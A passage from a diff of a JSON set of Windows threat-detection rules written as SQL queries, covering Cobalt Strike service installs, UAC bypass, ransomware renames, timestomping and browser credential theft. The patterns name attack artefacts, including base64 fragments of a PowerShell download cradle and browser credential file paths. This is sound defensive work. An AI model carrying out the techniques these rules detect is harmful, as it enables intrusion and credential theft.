'stopped')" + "SELECT * FROM logs WHERE TargetFilename LIKE '%.cmdline' ESCAPE '\\'" ], - "filename": "win_system_defender_disabled.yml" + "filename": "file_event_win_csharp_compile_artefact.yml" }, { - "title": "CobaltStrike Service Installations - System", - "id": "5a105d34-05fc-401e-8553-272b45c1522d", + "title": "Files With System Process Name In Unsuspected Locations", + "id": "d5866ddf-ce8f-4aea-b28e-d96485a20d3d", "status": "test", - "description": "Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement", - "author": "Florian Roth (Nextron Systems), Wojciech Lesicki", + "description": "Detects the creation of an executable with a system process name in folders other than the system ones (System32, SysWOW64...etc).", + "author": "Sander Wiebing, Tim Shelton, Nasreddine Bencherchali", "tags": [ - "attack.execution", - "attack.privilege_escalation", - "attack.lateral_movement", - "attack.t1021.002", - "attack.t1543.003", - "attack.t1569.002" + "attack.defense_evasion", + "attack.t1036.005" ], "falsepositives": [ - "Unknown" + "System processes copied outside their default folders for testing purposes", + "Third party software naming their software with the same names as the processes mentioned here" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND ((ImagePath LIKE '%ADMIN$%' ESCAPE '\\' AND ImagePath LIKE '%.exe%' ESCAPE '\\') OR (ImagePath LIKE '%\\%COMSPEC\\%%' ESCAPE '\\' AND ImagePath LIKE '%start%' ESCAPE '\\' AND ImagePath LIKE '%powershell%' ESCAPE '\\') OR ImagePath LIKE '%powershell -nop -w hidden -encodedcommand%' ESCAPE '\\' OR ImagePath LIKE '%SUVYIChOZXctT2JqZWN0IE5ldC5XZWJjbGllbnQpLkRvd25sb2FkU3RyaW5nKCdodHRwOi8vMTI3LjAuMC4xO%' ESCAPE '\\' OR ImagePath LIKE '%lFWCAoTmV3LU9iamVjdCBOZXQuV2ViY2xpZW50KS5Eb3dubG9hZFN0cmluZygnaHR0cDovLzEyNy4wLjAuMT%' 
ESCAPE '\\' OR ImagePath LIKE '%JRVggKE5ldy1PYmplY3QgTmV0LldlYmNsaWVudCkuRG93bmxvYWRTdHJpbmcoJ2h0dHA6Ly8xMjcuMC4wLjE6%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\AtBroker.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\audiodg.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\backgroundTaskHost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\bcdedit.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\cmdl32.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\conhost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\csrss.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\dasHost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\dfrgui.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\dllhost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\dwm.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\eventcreate.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\eventvwr.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\explorer.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\extrac32.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\fontdrvhost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\ipconfig.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\iscsicli.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\iscsicpl.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\logman.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\LogonUI.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\LsaIso.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsass.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsm.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\msinfo32.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\mstsc.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\nbtstat.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\odbcconf.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\powershell.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\regini.exe' 
ESCAPE '\\' OR TargetFilename LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\RuntimeBroker.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SearchFilterHost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SearchIndexer.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SearchProtocolHost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SecurityHealthService.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SecurityHealthSystray.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\services.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\ShellAppRuntime.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sihost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\smartscreen.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\smss.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\svchost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SystemSettingsBroker.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\taskhost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\taskhostw.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Taskmgr.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\TiWorker.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\w32tm.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WerFault.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WerFaultSecure.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wermgr.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wevtutil.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wininit.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\winlogon.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\winrshost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WinRTNetMUAHostServer.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wlanext.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wlrmdr.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WmiPrvSE.exe' ESCAPE '\\' OR TargetFilename LIKE 
'%\\\\wslhost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WSReset.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WUDFHost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WWAHost.exe' ESCAPE '\\') AND NOT (((TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\SoftwareDistribution\\\\%' ESCAPE '\\' OR TargetFilename LIKE '\\\\SystemRoot\\\\System32\\\\%' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\Windows\\\\System32\\\\dism.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\TiWorker.exe' ESCAPE '\\')) OR (TargetFilename LIKE 'C:\\\\$WINDOWS.~BT\\\\%' ESCAPE '\\' AND NewProcessName LIKE 'C:\\\\$WINDOWS.~BT\\\\Sources\\\\SetupHost.exe' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\RuntimeBroker.exe' ESCAPE '\\' AND NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\wbengine.exe' ESCAPE '\\') OR (NewProcessName LIKE '%:\\\\Windows\\\\system32\\\\svchost.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Windows\\\\SoftwareDistribution\\\\Download\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\bcdedit.exe' ESCAPE '\\')) OR (NewProcessName LIKE '%:\\\\Windows\\\\system32\\\\svchost.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:Program Files\\\\WindowsApps\\\\%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\wuauclt.exe' ESCAPE '\\') OR (TargetFilename LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\WINDOWS\\\\system32\\\\msiexec.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Program Files\\\\PowerShell\\\\7\\\\pwsh.exe' ESCAPE '\\') OR (TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\SecurityHealth\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\SecurityHealthSystray.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\SecurityHealthSetup.exe' ESCAPE '\\')))" ], - "filename": 
"win_system_cobaltstrike_service_installs.yml" + "filename": "file_event_win_creation_system_file.yml" }, { - "title": "RTCore Suspicious Service Installation", - "id": "91c49341-e2ef-40c0-ac45-49ec5c3fe26c", - "status": "experimental", - "description": "Detects the installation of RTCore service. Which could be an indication of Micro-Star MSI Afterburner vulnerable driver abuse", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "UAC Bypass Using .NET Code Profiler on MMC", + "id": "93a19907-d4f9-4deb-9f91-aac4692776a6", + "status": "test", + "description": "Detects the pattern of UAC Bypass using .NET Code Profiler and mmc.exe DLL hijacking (UACMe 39)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.persistence" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName = 'RTCore64')" + "SELECT * FROM logs WHERE (TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\pe386.dll' ESCAPE '\\')" ], - "filename": "win_system_susp_rtcore64_service_install.yml" + "filename": "file_event_win_uac_bypass_dotnet_profiler.yml" }, { - "title": "Invoke-Obfuscation CLIP+ Launcher - System", - "id": "f7385ee2-0e0c-11eb-adc1-0242ac120002", + "title": "Potential Privilege Escalation Attempt Via .Exe.Local Technique", + "id": "07a99744-56ac-40d2-97b7-2095967b0e03", "status": "experimental", - "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "description": "Detects potential privilege escalation attempt via the creation of the \"*.Exe.Local\" folder inside the \"System32\" directory in order to sideload \"comctl32.dll\"", + "author": "Nasreddine Bencherchali (Nextron Systems), Subhash P (@pbssubhash)", 
"tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.persistence", + "attack.privilege_escalation" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%cmd%' ESCAPE '\\' AND ImagePath LIKE '%&&%' ESCAPE '\\' AND ImagePath LIKE '%clipboard]::%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\logonUI.exe.local%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\werFault.exe.local%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\consent.exe.local%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\narrator.exe.local%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\wermgr.exe.local%' ESCAPE '\\') AND TargetFilename LIKE '%\\\\comctl32.dll' ESCAPE '\\')" ], - "filename": "win_system_invoke_obfuscation_clip_services.yml" + "filename": "file_event_win_system32_local_folder_privilege_escalation.yml" }, { - "title": "Suspicious Service Installation", - "id": "1d61f71d-59d2-479e-9562-4ff5f4ead16b", + "title": "Potential Persistence Via Notepad++ Plugins", + "id": "54127bd4-f541-4ac3-afdb-ea073f63f692", "status": "experimental", - "description": "Detects suspicious service installation commands", - "author": "pH-T (Nextron Systems)", + "description": "Detects creation of new \".dll\" files inside the plugins directory of a notepad++ installation by a process other than \"gup.exe\". 
Which could indicates possible persistence", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "car.2013-09-005", - "attack.t1543.003" + "attack.persistence" ], "falsepositives": [ - "Unknown" + "Possible FPs during first installation of Notepad++", + "Legitimate use of custom plugins by users in order to enhance notepad++ functionalities" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND ((Provider_Name = 'Service Control Manager' AND EventID = '7045') AND ((ImagePath LIKE '% -w hidden %' ESCAPE '\\' OR ImagePath LIKE '% -nop %' ESCAPE '\\' OR ImagePath LIKE '% -sta %' ESCAPE '\\' OR ImagePath LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR ImagePath LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR ImagePath LIKE '%\\\\Perflogs\\\\%' ESCAPE '\\' OR ImagePath LIKE '%\\\\\\\\.\\\\pipe%' ESCAPE '\\' OR ImagePath LIKE '%\\\\ADMIN$\\\\%' ESCAPE '\\' OR ImagePath LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\' OR ImagePath LIKE '%.downloadstring(%' ESCAPE '\\' OR ImagePath LIKE '%.downloadfile(%' ESCAPE '\\') OR (ImagePath LIKE '% -e%' ESCAPE '\\' AND (ImagePath LIKE '% JAB%' ESCAPE '\\' OR ImagePath LIKE '% SUVYI%' ESCAPE '\\' OR ImagePath LIKE '% SQBFAFgA%' ESCAPE '\\' OR ImagePath LIKE '% aWV4I%' ESCAPE '\\' OR ImagePath LIKE '% IAB%' ESCAPE '\\' OR ImagePath LIKE '% PAA%' ESCAPE '\\' OR ImagePath LIKE '% aQBlAHgA%' ESCAPE '\\')))) AND NOT ((ImagePath LIKE 'C:\\\\WINDOWS\\\\TEMP\\\\thor10-remote\\\\thor64.exe%' ESCAPE '\\') OR (ImagePath LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Definition Updates\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\Notepad++\\\\plugins\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.dll' ESCAPE '\\') AND NOT ((NewProcessName LIKE '%\\\\Notepad++\\\\updater\\\\gup.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND NewProcessName LIKE 
'%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\target.exe' ESCAPE '\\' OR NewProcessName LIKE '%Installer.x64.exe' ESCAPE '\\'))))" ], - "filename": "win_system_susp_service_installation.yml" + "filename": "file_event_win_notepad_plus_plus_persistence.yml" }, { - "title": "Tap Driver Installation", - "id": "8e4cf0e5-aa5d-4dc3-beff-dc26917744a9", - "status": "test", - "description": "Well-known TAP software installation. Possible preparation for data exfiltration using tunnelling techniques", - "author": "Daniil Yugoslavskiy, Ian Davis, oscd.community", + "title": "Potential Startup Shortcut Persistence Via PowerShell.EXE", + "id": "92fa78e7-4d39-45f1-91a3-8b23f3f1088d", + "status": "experimental", + "description": "Detects PowerShell writing startup shortcuts.\nThis procedure was highlighted in Red Canary Intel Insights Oct. 2021, \"We frequently observe adversaries using PowerShell to write malicious .lnk files into the startup directory to establish persistence.\nAccordingly, this detection opportunity is likely to identify persistence mechanisms in multiple threats.\nIn the context of Yellow Cockatoo, this persistence mechanism eventually launches the command-line script that leads to the installation of a malicious DLL\"\n", + "author": "Christopher Peacock '@securepeacock', SCYTHE", "tags": [ - "attack.exfiltration", - "attack.t1048" + "attack.persistence", + "attack.t1547.001" ], "falsepositives": [ - "Legitimate OpenVPN TAP insntallation" + "Depending on your environment accepted applications may leverage this at times. It is recommended to search for anomalies inidicative of malware." 
], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%tap0901%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND TargetFilename LIKE '%\\\\start menu\\\\programs\\\\startup\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.lnk' ESCAPE '\\')" ], - "filename": "win_system_tap_driver_installation.yml" + "filename": "file_event_win_powershell_startup_shortcuts.yml" }, { - "title": "Important Windows Eventlog Cleared", - "id": "100ef69e-3327-481c-8e5c-6d80d9507556", + "title": "Rename Common File to DLL File", + "id": "bbfd974c-248e-4435-8de6-1e938c79c5c1", "status": "experimental", - "description": "Detects the clearing of one of the Windows Core Eventlogs. e.g. caused by \"wevtutil cl\" command execution", - "author": "Florian Roth (Nextron Systems), Tim Shelton", - "tags": [ - "attack.defense_evasion", - "attack.t1070.001", - "car.2016-04-002" - ], + "description": "Detects cases in which a file gets renamed to .dll, which often happens to bypass perimeter protection", + "author": "frack113", "falsepositives": [ - "Rollout of log collection agents (the setup routine often includes a reset of the local Eventlog)", - "System provisioning (system reset before the golden image creation)" + "Application installation" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '104' AND Provider_Name = 'Microsoft-Windows-Eventlog' AND Channel IN ('System', 'Security', 'Application'))" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%.dll' ESCAPE '\\' AND NOT (((SourceFilename LIKE '%.dll' ESCAPE '\\' OR SourceFilename LIKE '%.tmp' ESCAPE '\\') OR (SourceFilename LIKE '%.dll.%' ESCAPE '\\' OR SourceFilename LIKE '%\\\\SquirrelTemp\\\\temp%' ESCAPE '\\')) OR (SourceFilename = '') OR 
(SourceFilename = '') OR (NewProcessName LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\TiWorker.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\wuauclt.exe' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\$WINDOWS.~BT\\\\Sources\\\\%' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\'))))" ], - "filename": "win_system_susp_eventlog_cleared.yml" + "filename": "file_rename_win_not_dll_to_dll.yml" }, { - "title": "Mesh Agent Service Installation", - "id": "e0d1ad53-c7eb-48ec-a87a-72393cc6cedc", + "title": "Suspicious Appended Extension", + "id": "e3f673b3-65d1-4d80-9146-466f8b63fa99", "status": "experimental", - "description": "Detects a Mesh Agent service installation. Mesh Agent is used to remotely manage computers", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects possible ransomware adding a custom extension to the encrypted files, such as \".jpg.crypted\", \".docx.locky\" etc.", + "author": "frack113", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.impact", + "attack.t1486" ], "falsepositives": [ - "Legitimate use of the tool" + "Backup software" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND (ImagePath LIKE '%MeshAgent.exe%' ESCAPE '\\' OR ServiceName LIKE '%Mesh Agent%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (((SourceFilename LIKE '%.lnk' ESCAPE '\\' OR SourceFilename LIKE '%.rtf' ESCAPE '\\' OR SourceFilename LIKE '%.pst' ESCAPE '\\' OR SourceFilename LIKE '%.docx' ESCAPE '\\' OR SourceFilename LIKE '%.xlsx' ESCAPE '\\' OR SourceFilename LIKE '%.jpg' ESCAPE '\\' OR SourceFilename LIKE '%.jpeg' ESCAPE '\\' OR SourceFilename LIKE '%.png' ESCAPE '\\' OR SourceFilename LIKE '%.pdf' ESCAPE '\\') AND (TargetFilename LIKE '%.lnk.%' ESCAPE '\\' OR TargetFilename 
LIKE '%.rtf.%' ESCAPE '\\' OR TargetFilename LIKE '%.pst.%' ESCAPE '\\' OR TargetFilename LIKE '%.docx.%' ESCAPE '\\' OR TargetFilename LIKE '%.xlsx.%' ESCAPE '\\' OR TargetFilename LIKE '%.jpg.%' ESCAPE '\\' OR TargetFilename LIKE '%.jpeg.%' ESCAPE '\\' OR TargetFilename LIKE '%.png.%' ESCAPE '\\' OR TargetFilename LIKE '%.pdf.%' ESCAPE '\\')) AND NOT (((TargetFilename LIKE '%.tmp' ESCAPE '\\' OR TargetFilename LIKE '%.bak' ESCAPE '\\' OR TargetFilename LIKE '%.old' ESCAPE '\\' OR TargetFilename LIKE '%.orig' ESCAPE '\\' OR TargetFilename LIKE '%.backup' ESCAPE '\\' OR TargetFilename LIKE '%.temp' ESCAPE '\\')) OR (TargetFilename LIKE 'C:\\\\ProgramData\\\\Anaconda3\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.c~' ESCAPE '\\')))" ], - "filename": "win_system_service_install_mesh_agent.yml" + "filename": "file_rename_win_ransomware.yml" }, { - "title": "Exploit SamAccountName Spoofing with Kerberos", - "id": "44bbff3e-4ca3-452d-a49a-6efa4cafa06f", - "status": "test", - "description": "The attacker creates a computer object using those permissions with a password known to her.\nAfter that she clears the attribute ServicePrincipalName on the computer object.\nBecause she created the object (CREATOR OWNER), she gets granted additional permissions and can do many changes to the object.\n", - "author": "frack113", + "title": "Unusual File Modification by dns.exe", + "id": "9f383dc0-fdeb-4d56-acbc-9f9f4f8f20f3", + "status": "experimental", + "description": "Detects an unexpected file being modified by dns.exe which my indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)", + "author": "Tim Rauch (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1558.003" + "attack.initial_access", + "attack.t1133" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND ((Provider_Name = 
'Microsoft-Windows-Kerberos-Key-Distribution-Center' AND EventID IN ('35', '36', '37', '38')) OR (Provider_Name = 'Microsoft-Windows-Directory-Services-SAM' AND EventID IN ('16990', '16991'))))" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\dns.exe' ESCAPE '\\' AND NOT (TargetFilename LIKE '%\\\\dns.log' ESCAPE '\\'))" ], - "filename": "win_system_vul_cve_2021_42278_or_cve_2021_42287.yml" + "filename": "file_change_win_unusual_modification_by_dns_exe.yml" }, { - "title": "Invoke-Obfuscation Obfuscated IEX Invocation - System", - "id": "51aa9387-1c53-4153-91cc-d73c59ae1ca9", + "title": "File Creation Date Changed to Another Year", + "id": "558eebe5-f2ba-4104-b339-36f7902bcc1a", "status": "experimental", - "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block linked in the references", - "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", + "description": "Attackers may change the file creation time of a backdoor to make it look like it was installed with the operating system.\nNote that many processes legitimately change the creation time of a file; it does not necessarily indicate malicious activity.\n", + "author": "frack113, Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027" + "attack.t1070.006", + "attack.defense_evasion" ], "falsepositives": [ - "Unknown" + "Changes made to or by the local NTP service" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '7045' AND (ImagePath REGEXP '\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[' OR ImagePath REGEXP '\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[' OR ImagePath REGEXP '\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[' OR ImagePath REGEXP '\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}' OR ImagePath REGEXP '\\\\*mdr\\*\\W\\s*\\)\\.Name' OR ImagePath REGEXP '\\$VerbosePreference\\.ToString\\(' OR 
ImagePath REGEXP '\\String\\]\\s*\\$VerbosePreference'))" + "SELECT * FROM logs WHERE (((PreviousCreationUtcTime LIKE '2022%' ESCAPE '\\' AND NOT (CreationUtcTime LIKE '2022%' ESCAPE '\\')) OR (PreviousCreationUtcTime LIKE '202%' ESCAPE '\\' AND NOT (CreationUtcTime LIKE '202%' ESCAPE '\\'))) AND NOT (((NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\ProvTool.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\usocoreworker.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\ImmersiveControlPanel\\\\SystemSettings.exe' ESCAPE '\\') OR TargetFilename LIKE 'C:\\\\ProgramData\\\\USOPrivate\\\\UpdateStore\\\\%' ESCAPE '\\' OR (TargetFilename LIKE '%.tmp' ESCAPE '\\' OR TargetFilename LIKE '%.temp' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\WINDOWS\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\TiWorker.exe' ESCAPE '\\' AND TargetFilename LIKE '%.cab' ESCAPE '\\')))" ], - "filename": "win_system_invoke_obfuscation_obfuscated_iex_services.yml" + "filename": "file_change_win_2022_timestomping.yml" }, { - "title": "QuarksPwDump Clearing Access History", - "id": "39f919f3-980b-4e6f-a975-8af7e507ef2b", - "status": "test", - "description": "Detects QuarksPwDump clearing access history in hive", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious Access To Browser Credential Files", + "id": "91cb43db-302a-47e3-b3c8-7ede481e27bf", + "status": "experimental", + "description": "Detects suspicious processes based on name and location that access the browser credential stores which can be the sign of credential stealing", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1003.002" + "attack.t1003", + "attack.credential_access" ], "falsepositives": [ - "Unknown" + "Antivirus, Anti-Spyware, Anti-Malware Software", + "Backup software", + "Legitimate software installed on partitions other than \"C:\\\"", + "Searching software such as \"everything.exe\"" ], - "level": "critical", + "level": "medium", "rule": [ - 
"SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '16' AND Provider_Name = 'Microsoft-Windows-Kernel-General' AND HiveName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\SAM%' ESCAPE '\\' AND HiveName LIKE '%.dmp' ESCAPE '\\')" + "SELECT * FROM logs WHERE (((FileName LIKE '%\\\\Appdata\\\\Local\\\\Microsoft\\\\Windows\\\\WebCache\\\\WebCacheV01.dat' ESCAPE '\\' OR (FileName LIKE '%\\\\cookies.sqlite' ESCAPE '\\' OR FileName LIKE '%release\\\\key3.db' ESCAPE '\\' OR FileName LIKE '%release\\\\key4.db' ESCAPE '\\' OR FileName LIKE '%release\\\\logins.json' ESCAPE '\\') OR (FileName LIKE '%\\\\AppData\\\\Local\\\\Google\\\\Chrome\\\\User Data\\\\Default\\\\Network\\\\Cookies%' ESCAPE '\\' OR FileName LIKE '%\\\\Appdata\\\\Local\\\\Chrome\\\\User Data\\\\Default\\\\Login Data%' ESCAPE '\\' OR FileName LIKE '%\\\\AppData\\\\Local\\\\Google\\\\Chrome\\\\User Data\\\\Local State%' ESCAPE '\\')) AND NOT ((NewProcessName = 'System' AND ParentProcessName = 'Idle') OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\WINDOWS\\\\system32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\WINDOWS\\\\SysWOW64\\\\%' ESCAPE '\\')))) AND NOT ((NewProcessName LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\MpCopyAccelerator.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\MsMpEng.exe' ESCAPE '\\')) OR ((NewProcessName LIKE '%\\\\thor64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\thor.exe' ESCAPE '\\')) OR (ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\')))" ], - "filename": "win_system_quarkspwdump_clearing_hive_access_history.yml" + "filename": "file_access_win_browser_credential_stealing.yml" }, { - "title": "Service Installation with Suspicious Folder Pattern", - "id": 